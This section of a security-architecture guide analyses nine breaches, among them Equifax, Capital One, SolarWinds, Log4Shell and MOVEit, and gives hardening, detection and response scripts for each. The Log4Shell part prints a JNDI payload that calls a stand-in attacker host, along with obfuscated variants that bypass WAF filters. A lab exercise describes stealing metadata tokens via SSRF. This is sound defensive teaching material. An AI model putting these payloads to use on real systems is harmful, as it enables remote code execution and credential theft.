Section 10

Real-World Case Studies

Every architecture failure tells a story about controls that were missing, misconfigured, or ignored. These 9 case studies — 7 breaches and 2 success stories — span supply chain attacks, cloud misconfigurations, zero-days, and identity compromise, representing over $5 billion in damages.

Why Study Breaches as an Architect?

The breaches on this page exposed over 400 million records. Each one could have been prevented or sharply contained with architecture patterns covered in this guide. Understanding how controls failed is more valuable than knowing what controls exist: it transforms checklists into conviction.

Attack Vector Landscape — 9 Case Studies by Category

flowchart TB
  subgraph ext[" External Attack Surface "]
    EQ["Equifax 2017\nUnpatched Struts"]
    CO["Capital One 2019\nSSRF + IMDSv1"]
    MV["MOVEit 2023\nSQL Injection"]
    LS["Log4Shell 2021\nLibrary RCE"]
  end
  subgraph sup[" Supply Chain / Identity "]
    SW["SolarWinds 2020\nBuild Compromise"]
    OK["Okta 2022\nContractor Access"]
    MS["Storm-0558 2023\nKey Leakage"]
  end
  subgraph def[" Successful Defense "]
    CF["Cloudflare 2023\nZero Trust"]
    BC["Google BeyondCorp\nNo Perimeter"]
  end
  style EQ fill:#f87171,stroke:#000,color:#000
  style CO fill:#f87171,stroke:#000,color:#000
  style MV fill:#f87171,stroke:#000,color:#000
  style LS fill:#f87171,stroke:#000,color:#000
  style SW fill:#a855f7,stroke:#000,color:#000
  style OK fill:#a855f7,stroke:#000,color:#000
  style MS fill:#a855f7,stroke:#000,color:#000
  style CF fill:#4ade80,stroke:#000,color:#000
  style BC fill:#4ade80,stroke:#000,color:#000

Case Study 1: The Equifax Breach (2017)

What Happened

147 million records exposed due to an unpatched Apache Struts vulnerability (CVE-2017-5638). Attackers had access for 76 days before detection.

MITRE ATT&CK: T1190 (Exploit Public-Facing App), T1505.003 (Web Shell), T1078 (Valid Accounts)

  • Records Exposed: 147M
  • Dwell Time: 76 days
  • Total Cost: $1.4B
  • Apache Struts RCE: CVE-2017-5638

Equifax Attack Chain

flowchart LR
  A["Recon: Scan for\nApache Struts"] -->|CVE-2017-5638| B["Initial Access:\nRCE via Struts"]
  B --> C["Persistence:\nWeb Shells"]
  C --> D["Lateral Movement:\nFlat Network"]
  D --> E["Collection:\nUnencrypted PII"]
  E --> F["Exfiltration:\n147M Records"]
  style A fill:#f87171,stroke:#000,color:#000
  style B fill:#f87171,stroke:#000,color:#000
  style C fill:#ec4899,stroke:#000,color:#000
  style D fill:#a855f7,stroke:#000,color:#000
  style E fill:#22d3ee,stroke:#000,color:#000
  style F fill:#4ade80,stroke:#000,color:#000

Architecture Failures

  • Unpatched internet-facing server
  • Expired SSL certificate on monitoring tool
  • Flat network allowed lateral movement
  • Sensitive data not encrypted at rest
  • Poor network segmentation

Lessons Learned

  • Automated patch management is critical
  • Network segmentation limits blast radius
  • Encrypt sensitive data at rest
  • Monitor SSL certificate expiration
  • Defense in depth matters

What Would Have Prevented This

Network segmentation would have blocked lateral movement. Encryption at rest would have rendered stolen data unusable. Automated patching with SLA enforcement (48-hour critical patch window) would have closed the vulnerability before exploitation. Any one of these controls would have dramatically reduced impact — together they represent defense in depth.
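The 48-hour critical patch window mentioned above can be checked mechanically. The following is a minimal sketch, assuming a hypothetical findings inventory; the `Finding` record and the `sla_breaches` helper are illustrative names, not part of any scanner's API.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Optional

CRITICAL_SLA = timedelta(hours=48)  # window taken from the text above


@dataclass
class Finding:
    """One vulnerable host/CVE pair from a (hypothetical) scanner export."""
    host: str
    cve: str
    severity: str                           # e.g. "critical", "high"
    disclosed_at: datetime
    patched_at: Optional[datetime] = None   # None means still unpatched


def sla_breaches(findings, now):
    """Return critical findings that were not patched within the SLA window."""
    late = []
    for f in findings:
        if f.severity != "critical":
            continue
        deadline = f.disclosed_at + CRITICAL_SLA
        # An unpatched finding is judged against the current time.
        resolved = f.patched_at if f.patched_at is not None else now
        if resolved > deadline:
            late.append(f)
    return late
```

Feeding this from a scheduled scan and failing a pipeline or paging an owner when the list is non-empty is one way to turn the SLA from a policy statement into an enforced control.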

Case Study 2: Capital One Breach (2019)

What Happened

106 million records exposed via an SSRF attack against a misconfigured web application firewall (WAF) running on AWS. The attacker exploited the WAF's overly permissive IAM role to access S3 buckets.

MITRE ATT&CK: T1190 (Exploit Public-Facing App), T1552.005 (Cloud Instance Metadata), T1078 (Valid Accounts), T1530 (Data from Cloud Storage)

  • Records Exposed: 106M
  • Settlement Cost: $190M
  • Attack Vector: SSRF
  • Root Cause: IMDSv1

Capital One SSRF Attack Chain

flowchart LR
  A["Attacker crafts\nSSRF request"] --> B["WAF forwards to\nmetadata endpoint"]
  B -->|"169.254.169.254"| C["IMDSv1 returns\nIAM credentials"]
  C --> D["Assume role with\nexcessive S3 access"]
  D --> E["List & download\nS3 buckets"]
  E --> F["106M records\nexfiltrated"]
  style A fill:#f87171,stroke:#000,color:#000
  style B fill:#f87171,stroke:#000,color:#000
  style C fill:#ec4899,stroke:#000,color:#000
  style D fill:#a855f7,stroke:#000,color:#000
  style E fill:#22d3ee,stroke:#000,color:#000
  style F fill:#4ade80,stroke:#000,color:#000

Architecture Failures

  • WAF role had excessive S3 permissions
  • SSRF not blocked by WAF
  • IMDSv1 allowed credential theft
  • No detection of unusual API calls
  • Sensitive data in S3 not adequately protected

Lessons Learned

  • Apply least privilege to all IAM roles
  • Require IMDSv2 on AWS; on Azure, use Managed Identities instead of stored credentials
  • Monitor CloudTrail (Activity Log on Azure) for anomalous API activity
  • Regular IAM permission audits
  • Cloud-native security tools matter

Prevention: Enforce IMDSv2 & Least Privilege

enforce-imdsv2.sh
bash
# Reduce SSRF-based credential theft (the Capital One vector).
# Azure: give the VM a system-assigned Managed Identity instead of stored credentials
az vm identity assign \
  --resource-group prod-rg \
  --name app-vm-01

# Audit ALL VMs for public IP exposure
az vm list -d --query '[].{Name:name, PublicIP:publicIps, RG:resourceGroup}' -o table

# Terraform (HCL): this belongs in a .tf file, not in the shell script above
# resource "azurerm_linux_virtual_machine" "secure" {
#   # ... required arguments (name, size, image, admin settings) omitted ...
#
#   identity {
#     type = "SystemAssigned"  # Use managed identity, not stored credentials
#   }
#
#   # No public IP: attach only NICs without one, so traffic arrives via Application Gateway.
#   # azurerm_network_interface.private is a hypothetical NIC defined elsewhere.
#   network_interface_ids = [azurerm_network_interface.private.id]
# }

What Would Have Prevented This

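Enforcing IMDSv2, which requires a session token obtained through a PUT request, would very likely have stopped the simple SSRF request from reading role credentials off the metadata endpoint. Managed Identities (the Azure analogue) remove stored secrets but do not by themselves stop SSRF, so the metadata endpoint still needs protecting. Least privilege (scoping the WAF role to only the storage paths it requires) would have limited blast radius to near zero. CloudTrail anomaly detection (Activity Log on Azure) would have flagged the unusual bulk list and GetObject calls against S3.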
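Least privilege can be spot-checked by scanning policy documents for wildcards. The sketch below assumes the AWS IAM JSON policy layout (`Statement`, `Effect`, `Action`, `Resource`), since the breach occurred on AWS; the function name `overly_broad_statements` is hypothetical, and a real review would also consider conditions, `NotAction`, and resource-based policies.

```python
def _as_list(value):
    """IAM allows a single string or a list; normalize to a list."""
    if value is None:
        return []
    return [value] if isinstance(value, str) else list(value)


def overly_broad_statements(policy):
    """Return Allow statements whose Action or Resource uses a wildcard."""
    statements = policy.get("Statement", [])
    if isinstance(statements, dict):      # a single statement is also valid
        statements = [statements]

    flagged = []
    for stmt in statements:
        if stmt.get("Effect") != "Allow":
            continue
        actions = _as_list(stmt.get("Action"))
        resources = _as_list(stmt.get("Resource"))
        broad_action = any(a == "*" or a.endswith(":*") for a in actions)
        broad_resource = any(r == "*" for r in resources)
        if broad_action or broad_resource:
            flagged.append(stmt)
    return flagged
```

A role attached to a WAF that needs one configuration bucket should produce an empty list here; anything flagged is a candidate for scoping down before it becomes blast radius.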

Case Study 3: SolarWinds Supply Chain Attack (2020)

What Happened

Nation-state attackers compromised SolarWinds' build system, injecting malware into Orion software updates. 18,000+ organizations installed the backdoor.

Architecture Failures

  • Build server compromise went undetected
  • Code signing didn't prevent injection
  • Trusted software had excessive network access
  • Minimal monitoring of outbound traffic
  • Domain fronting evaded detection

Lessons Learned

  • Secure the software supply chain
  • Reproducible builds for verification
  • Monitor build system integrity
  • Zero Trust for internal software too
  • Limit network access of monitoring tools
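The "reproducible builds for verification" lesson comes down to a simple comparison: build the same source on independent systems and require identical output. A minimal sketch, assuming the artifacts are already available as bytes; `digest` and `builds_match` are illustrative names.

```python
import hashlib


def digest(artifact: bytes) -> str:
    """SHA-256 hex digest of a build artifact."""
    return hashlib.sha256(artifact).hexdigest()


def builds_match(*artifacts: bytes) -> bool:
    """True when every independently built artifact has the same digest."""
    if len(artifacts) < 2:
        raise ValueError("need at least two independent builds to compare")
    return len({digest(a) for a in artifacts}) == 1
```

If a compromised build server injects code, its output stops matching the artifact produced by a second, isolated builder, which is a signal that a valid code signature alone cannot provide.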

SolarWinds Supply Chain Attack Flow

flowchart TD
  A["Attacker compromises\nSolarWinds build server"] --> B["Malicious DLL injected\ninto Orion update"]
  B --> C["Signed with valid\nSolarWinds certificate"]
  C --> D["18,000+ orgs install\ntrusted update"]
  D --> E["SUNBURST backdoor\nbeacons to C2"]
  E --> F["Lateral movement in\nhigh-value targets"]
  style A fill:#f87171,stroke:#000,color:#000
  style B fill:#f87171,stroke:#000,color:#000
  style C fill:#ec4899,stroke:#000,color:#000
  style D fill:#a855f7,stroke:#000,color:#000
  style E fill:#22d3ee,stroke:#000,color:#000
  style F fill:#4ade80,stroke:#000,color:#000

Prevention: Supply Chain Integrity Verification

supply-chain-verify.sh
bash
# === Supply Chain Integrity (lessons from SolarWinds) ===

# 1. Verify SLSA build provenance
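# Keyless verification also needs the expected signer identity; the regexp
# below is an assumed repository path, so adjust it to your own workflow.
cosign verify-attestation \
  --type slsaprovenance \
  --certificate-oidc-issuer "https://token.actions.githubusercontent.com" \
  --certificate-identity-regexp "^https://github.com/org/" \
  ghcr.io/org/app:latest

# 2. Generate and scan SBOM for vulnerabilities
syft ghcr.io/org/app:latest -o spdx-json > sbom.json
grype sbom:sbom.json --fail-on critical

# 3. Verify artifact signatures before deployment
cosign verify --key cosign.pub ghcr.io/org/app:latest

# 4. Monitor build system integrity (cron job)
# Record the baseline once, from a known-good state:
sha256sum /usr/local/bin/build-agent > /etc/integrity/build-agent.sha256
# `alert` is a placeholder for your paging or notification command:
# */5 * * * * sha256sum -c /etc/integrity/build-agent.sha256 || alert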

Case Study 4: Log4Shell (2021)

What Happened

CVE-2021-44228 is a critical RCE in Apache Log4j 2 (CVSS 10.0). JNDI lookups in logged strings allowed remote code execution. Because Log4j 2 is embedded in a very large number of Java applications and products, exposure was extremely broad.

MITRE ATT&CK: T1190 (Exploit Public-Facing App), T1059.004 (Unix Shell), T1105 (Ingress Tool Transfer)

  • Maximum Severity: CVSS 10.0
  • Affected Versions: Log4j 2.0-beta9 through 2.14.1
  • Mass Exploitation: within 24 hrs
  • Log4j2 RCE: CVE-2021-44228

Log4Shell Attack Flow

flowchart LR
  A["Attacker injects JNDI\nstring via HTTP header"] --> B["Log4j processes\nlog message"]
  B --> C["JNDI lookup triggers\noutbound LDAP"]
  C --> D["Attacker LDAP returns\nmalicious Java class"]
  D --> E["Remote Code\nExecution"]
  E --> F["Cryptominer /\nRansomware /\nBackdoor"]
  style A fill:#f87171,stroke:#000,color:#000
  style B fill:#f87171,stroke:#000,color:#000
  style C fill:#ec4899,stroke:#000,color:#000
  style D fill:#a855f7,stroke:#000,color:#000
  style E fill:#22d3ee,stroke:#000,color:#000
  style F fill:#4ade80,stroke:#000,color:#000

Architecture Failures

  • Logging library had network call capability (violates economy of mechanism)
  • No SBOM: orgs didn't know where Log4j was deployed
  • Egress filtering not enforced (allowed LDAP/RMI outbound)
  • WAFs bypassed with obfuscation (${lower:j}ndi)

Lessons Learned

  • Maintain SBOMs for all applications
  • Restrict egress traffic by default
  • Libraries should follow least privilege
  • Defense in depth: patching alone isn't enough

Payload Anatomy — Why WAFs Weren't Enough

Basic payload: ${jndi:ldap://attacker.com/a}

Attackers rapidly developed obfuscated variants to bypass WAF rules:

  • ${${lower:j}ndi:ldap://...} — case manipulation
  • ${${::-j}${::-n}${::-d}${::-i}:ldap://...} — string slicing
  • ${${env:NaN:-j}ndi:ldap://...} — env variable defaults

These bypassed simple WAF rules matching exact "jndi:" strings — demonstrating why egress filtering (blocking outbound LDAP/RMI) was the critical control, not just input filtering.
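To see why exact-string matching fails, it helps to resolve the nested lookups before searching. The sketch below handles only the three obfuscation styles listed above (`lower`/`upper`, the `::-` slice, and `name:-default`); the function names are illustrative, and it is not an exhaustive detector, which is why egress filtering remains the stronger control.

```python
import re

# Innermost ${...} expression: no nested "$", "{" or "}" inside it.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(match):
    """Replace one innermost lookup with the text it would evaluate to."""
    body = match.group(1)
    lowered = body.lower()
    if lowered.startswith("jndi:"):
        return match.group(0)            # the lookup we are hunting; keep it
    if lowered.startswith("lower:"):
        return body[6:].lower()
    if lowered.startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:
        return body.split(":-", 1)[1]    # default value of ${name:-default}
    return match.group(0)                # unknown lookup; leave untouched


def normalize(text, max_passes=10):
    """Repeatedly resolve innermost lookups until the text stops changing."""
    for _ in range(max_passes):
        resolved = _INNERMOST.sub(_resolve, text)
        if resolved == text:
            break
        text = resolved
    return text


def looks_like_log4shell(text):
    """True if the normalized text contains a JNDI lookup."""
    return bool(_JNDI.search(normalize(text)))
```

Running each logged header or parameter through `looks_like_log4shell` catches the variants shown above that a literal `jndi:` match misses, while attackers remain free to invent lookups this sketch does not model.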

Detection & Response Playbook

log4shell-response.sh
bash
# === Log4Shell (CVE-2021-44228) Detection & Response ===

# 1. Find Log4j core JARs and report their versions
find / -name "log4j-core-*.jar" 2>/dev/null | while IFS= read -r jar; do
  # Manifest lines end in CRLF, so strip the carriage return
  version=$(unzip -p "$jar" META-INF/MANIFEST.MF 2>/dev/null | \
    grep '^Implementation-Version' | cut -d' ' -f2 | tr -d '\r')
  echo "$jar -> v$version"
done

# 2. Scan logs for exploitation attempts
# (case-insensitive; obfuscated variants may not contain the literal "jndi:")
grep -rni 'jndi:' /var/log/ 2>/dev/null

# 3. Block outbound JNDI protocols (egress containment, requires root)
iptables -A OUTPUT -p tcp --dport 389 -j DROP   # LDAP
iptables -A OUTPUT -p tcp --dport 636 -j DROP   # LDAPS
iptables -A OUTPUT -p tcp --dport 1099 -j DROP  # RMI

# 4. Emergency mitigation: remove JndiLookup class from every JAR found
# (one archive per zip call; a bare glob would treat extra JARs as entry names)
find / -name "log4j-core-*.jar" 2>/dev/null | while IFS= read -r jar; do
  zip -q -d "$jar" org/apache/logging/log4j/core/lookup/JndiLookup.class
done

# 5. Permanent fix: upgrade to Log4j >= 2.17.1

Case Study 5: Okta / Lapsus$ (2022)

What Happened

Lapsus$ compromised a third-party support contractor's laptop, gaining access to Okta's internal admin tools. Up to 366 Okta customers' tenants were potentially affected.

MITRE ATT&CK: T1199 (Trusted Relationship), T1078 (Valid Accounts), T1552 (Unsecured Credentials)

Architecture Failures

  • Third-party contractor had admin-level access
  • No separation of privilege for support tools
  • Delayed incident disclosure (2 months)
  • Insufficient access logging on contractor sessions

Lessons Learned

  • Apply Zero Trust to third-party access
  • Time-boxed, audited contractor sessions
  • Separation of duties for admin tools
  • Rapid incident communication to customers
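Time-boxed, audited contractor access with separation of duties can be expressed as a small authorization check. This is a minimal sketch under assumed names (`Grant`, `is_allowed`, and the tuple-based audit log are all hypothetical); a production system would back it with an identity provider and tamper-evident logging.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class Grant:
    """A single approved window of access to one support tool."""
    contractor: str
    tool: str
    approved_by: str
    starts_at: datetime
    duration: timedelta

    @property
    def expires_at(self):
        return self.starts_at + self.duration


def is_allowed(grant, contractor, tool, now, audit_log):
    """Allow only inside the window, for the named tool, with a second approver."""
    ok = (
        grant.contractor == contractor
        and grant.tool == tool
        and grant.approved_by != grant.contractor   # separation of duties
        and grant.starts_at <= now < grant.expires_at
    )
    # Every decision is recorded, including denials.
    audit_log.append((now.isoformat(), contractor, tool, "ALLOW" if ok else "DENY"))
    return ok
```

The design choice is that access expires by default: a compromised contractor laptop outside an approved window, or pointed at a different tool, gets a logged denial rather than standing admin access.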

Case Study 6: MOVEit Transfer (2023)

What Happened

CVE-2023-34362 — SQL injection zero-day in Progress MOVEit Transfer exploited by Cl0p ransomware gang. 2,500+ organizations affected, 60M+ individuals' data stolen.

MITRE ATT&CK: T1190 (Exploit Public-Facing App), T1505.003 (Web Shell), T1567 (Exfiltration Over Web Service)

Architecture Failures

  • SQL injection in 2023: basic input validation missing
  • Web shell deployment not detected
  • File transfer app directly on internet without WAF
  • Mass data exfiltration went unnoticed

Lessons Learned

  • Never expose file transfer tools directly to internet
  • WAF + IDS in front of all public-facing apps
  • Monitor for web shell indicators
  • DLP to detect bulk data exfiltration
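The bulk-exfiltration lesson can be illustrated with a very simple volume check. The sketch below assumes transfer logs have already been reduced to `(session_id, bytes_sent)` pairs; `flag_bulk_transfers` and the threshold are hypothetical, and real DLP tooling would add time windows, per-user baselines, and content inspection.

```python
from collections import defaultdict


def flag_bulk_transfers(events, byte_limit):
    """Return {session_id: total_bytes} for sessions that exceed byte_limit.

    events: iterable of (session_id, bytes_sent) tuples.
    """
    totals = defaultdict(int)
    for session_id, sent in events:
        totals[session_id] += sent
    return {s: t for s, t in totals.items() if t > byte_limit}
```

Even a coarse threshold like this would surface a single session pulling many gigabytes from a file transfer server, which is the pattern that went unnoticed in this incident.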

Detection: Web Shell Hunting & File Integrity

moveit-hardening.ps1
powershell
# === File Transfer Server Hardening (lessons from MOVEit) ===

# 1. Detect unauthorized web shells in MOVEit directories
Get-ChildItem -Path "C:\MOVEitTransfer\wwwroot" -Filter "*.aspx" -Recurse |
  Where-Object { $_.Name -notin @("default.aspx","login.aspx","human.aspx") } |
  Select-Object FullName, LastWriteTime, Length

# 2. File integrity monitoring vs. known-good baseline (CSV columns: Path, Hash)
$baseline = Import-Csv "C:\Security\moveit-baseline.csv"
Get-ChildItem -Path "C:\MOVEitTransfer\wwwroot" -Recurse -File |
  ForEach-Object {
    $file = $_   # capture: $_ is rebound inside the Where-Object block below
    $hash = (Get-FileHash $file.FullName -Algorithm SHA256).Hash
    $known = $baseline | Where-Object { $_.Path -eq $file.FullName }
    if (-not $known -or $known.Hash -ne $hash) {
      Write-Warning "ALERT: $($file.FullName) status=$(if($known){'MODIFIED'}else{'NEW'})"
    }
  }

# 3. Network architecture: NEVER expose file transfer directly
# Place behind reverse proxy + WAF, restrict source IPs, enable DLP

Case Study 7: Microsoft Storm-0558 (2023)

What Happened

A China-based threat actor acquired a Microsoft consumer (MSA) signing key, reportedly from a crash dump, and used it to forge Azure AD tokens and access government email accounts.

MITRE ATT&CK: T1552.004 (Private Keys), T1606.002 (SAML Tokens), T1114.002 (Remote Email Collection)

Architecture Failures

  • Signing key in crash dump (dev environment leak)
  • Consumer key accepted by enterprise service (validation gap)
  • No key rotation forced after potential exposure
  • Cloud audit logs not available to affected tenants

Lessons Learned

  • Strict key isolation between consumer/enterprise
  • Sanitize crash dumps for sensitive material
  • Token validation must check issuer scope
  • Log access must be available to all customers
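The validation gap (a consumer key accepted by an enterprise service) is a scope check that sits alongside signature verification. The sketch below assumes the signature has already been verified by a real JWT library and shows only the scope logic; `SigningKey`, `check_token_scope`, the key IDs, and the issuer URLs are all hypothetical.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class SigningKey:
    key_id: str
    scope: str   # "consumer" or "enterprise"


def check_token_scope(header, claims, keys, service_scope, trusted_issuers):
    """Reject tokens whose signing key or issuer belongs to another scope.

    Assumes the token signature was already verified against keys[kid].
    Returns (ok, reason).
    """
    key = keys.get(header.get("kid"))
    if key is None:
        return False, "unknown signing key"
    if key.scope != service_scope:
        return False, f"{key.scope} key presented to {service_scope} service"
    if claims.get("iss") not in trusted_issuers.get(service_scope, set()):
        return False, "issuer not trusted for this service"
    return True, "ok"
```

With this check in place, a token that is cryptographically valid under a consumer key is still refused by an enterprise mailbox service, which is the isolation the lessons above call for.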

Case Study 8: Cloudflare Thanksgiving 2023 (Positive)

What They Did Right

A suspected nation-state attacker used an access token and service account credentials stolen in the October 2023 Okta breach to access Cloudflare's self-hosted Atlassian server. Due to Zero Trust architecture, the blast radius was minimal despite initial access.

Why the Damage Was Limited

  • Zero Trust segmentation: Atlassian couldn't reach production
  • Most credentials exposed in the Okta incident had already been rotated; the few that were missed provided the only foothold
  • Detection via anomalous access patterns within about a day of the attacker establishing persistent access
  • Transparent public disclosure with full timeline
  • "Code Red" remediation: rotated more than 5,000 production credentials, even those not known to be compromised

Key Architecture Decisions

  • Assume breach mentality operationalized
  • Network segmentation prevented lateral movement to production
  • Comprehensive logging enabled rapid forensics
  • Incident response plan executed within minutes

Case Study 9: Secure Architecture Success - Google BeyondCorp

What They Did Right

After the Aurora attacks, Google rebuilt its security model. BeyondCorp eliminated the corporate network perimeter, implementing Zero Trust before the term was in wide use.

Architecture Decisions

  • No trusted network: all access is identity-based
  • Device trust established through inventory and health
  • Access Proxy mediates all application access
  • Context-aware access policies
  • Works the same from office, home, or coffee shop
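The decisions above can be read as a single access-proxy check in which network location carries no weight. This is a minimal sketch with hypothetical names (`AccessRequest`, `Policy`, `decide`); it illustrates the decision order only and is not Google's implementation.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class AccessRequest:
    user: str
    groups: frozenset
    device_in_inventory: bool
    device_healthy: bool
    network: str   # "office", "home", "cafe": recorded but never trusted


@dataclass(frozen=True)
class Policy:
    app: str
    required_group: str
    require_healthy_device: bool = True


def decide(request, policy):
    """Evaluate device trust first, then identity; ignore network location."""
    if not request.device_in_inventory:
        return "deny: unknown device"
    if policy.require_healthy_device and not request.device_healthy:
        return "deny: device unhealthy"
    if policy.required_group not in request.groups:
        return "deny: not authorized"
    return "allow"
```

Because `network` never appears in `decide`, the same user on the same managed device gets the same answer from the office or a coffee shop, which is the property that makes a VPN unnecessary for most access.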

Results

  • Eliminated VPN for most use cases
  • Consistent security regardless of location
  • Reduced attack surface dramatically
  • Better user experience than VPN
  • Model widely adopted as Zero Trust

Architecture Review Template

Security Architecture Review Checklist

1. Data Security
  • ☐ Data classification completed
  • ☐ Encryption at rest for sensitive data (AES-256)
  • ☐ TLS 1.2+ for all data in transit
  • ☐ Key management strategy defined (KMS/HSM)
  • ☐ Data retention and disposal policy
2. Identity & Access
  • ☐ Authentication mechanism defined (OAuth 2.0/OIDC)
  • ☐ MFA enforced for all human access
  • ☐ Authorization model documented (RBAC/ABAC)
  • ☐ Service-to-service auth specified (mTLS/JWT)
  • ☐ Least privilege applied and verified
  • ☐ Account lifecycle management (JIT, deprovisioning)
3. Network Security
  • ☐ Trust boundaries identified and documented
  • ☐ Network segmentation designed (VPC, subnets)
  • ☐ Ingress/egress controls defined
  • ☐ DDoS mitigation considered
  • ☐ DNS security (DNSSEC, DoH/DoT)
4. Application Security
  • ☐ Input validation at every trust boundary
  • ☐ OWASP Top 10 / API Top 10 mitigations
  • ☐ Secrets management (no hardcoded credentials)
  • ☐ Security headers configured (CSP, HSTS, XFO)
  • ☐ Dependency scanning in CI/CD pipeline
5. Operations & Resilience
  • ☐ Logging and monitoring strategy (SIEM/XDR)
  • ☐ Incident response plan documented and tested
  • ☐ Backup and recovery tested (RTO/RPO defined)
  • ☐ Patch management process with SLAs
  • ☐ Supply chain security (SBOM, vendor review)

Document Your Decisions

Architecture Decision Records (ADRs) capture why security decisions were made. Future teams need to understand the context to avoid undoing security controls. See Reference Architectures for an ADR template.

Framework Alignment

MITRE ATT&CK: Techniques referenced per case study above
NIST CSF 2.0: RS (Respond), RC (Recover) — lessons for incident response
ISO 27002:2022: 5.24 (Information security incident management planning and preparation), 5.25 (Assessment and decision on information security events)
Related: Security Frameworks → | Reference Architectures →

Cross-Cutting Analysis: Patterns Across Breaches

Mapping architectural failures across all 7 breaches reveals which controls deliver the most protection. The table below shows which failures contributed to each incident.

Architecture Failure Equifax CapOne Solar Log4j Okta MOVEit Storm Count
Inadequate monitoring / logging: 6
Excessive privileges / permissions: 4
Supply chain / third-party trust: 3
Missing / late patching: 3
No egress filtering: 3
Missing network segmentation: 2
No SBOM / asset inventory: 1
Data not encrypted at rest: 2

Key Takeaway: Prioritize Detection

Inadequate monitoring appears in 6 of 7 breaches — it's the single most common enabler. Excessive privileges is second. The Cloudflare and BeyondCorp success stories both demonstrate that Zero Trust + comprehensive logging is the architecture that limits blast radius even when initial access occurs. Prioritize detection, least privilege, and supply chain verification in your architecture reviews.

Architecture Case Study Labs

Apply breach analysis techniques to real-world scenarios and strengthen your architecture review skills.

Breach Post-Mortem Analysis (Custom Lab, medium)
  • Select a recent public breach from CISA advisories or NVD
  • Map the full attack chain using MITRE ATT&CK techniques
  • Identify which architecture controls failed or were absent
  • Design before/after architecture diagrams showing what would have prevented the breach
  • Write an Architecture Decision Record (ADR) for each proposed fix

SSRF & Cloud Metadata Hardening Lab (Custom Lab, hard)
  • Deploy a vulnerable web app on an Azure VM with a public IP and overly permissive NSG
  • Demonstrate SSRF to retrieve managed identity tokens from the metadata API
  • Remove the public IP, enforce Managed Identity, and verify the SSRF attack is mitigated
  • Implement least-privilege RBAC roles and verify reduced blast radius
  • Configure NSG Flow Logs and Azure Monitor alerts to detect the attack pattern

Supply Chain Security Assessment (Custom Lab, hard)
  • Generate SBOMs for your applications using Syft
  • Scan SBOMs for known vulnerabilities using Grype
  • Implement artifact signing with Cosign and Sigstore
  • Verify SLSA build provenance for a container image
  • Create a dependency update policy with automated PR reviews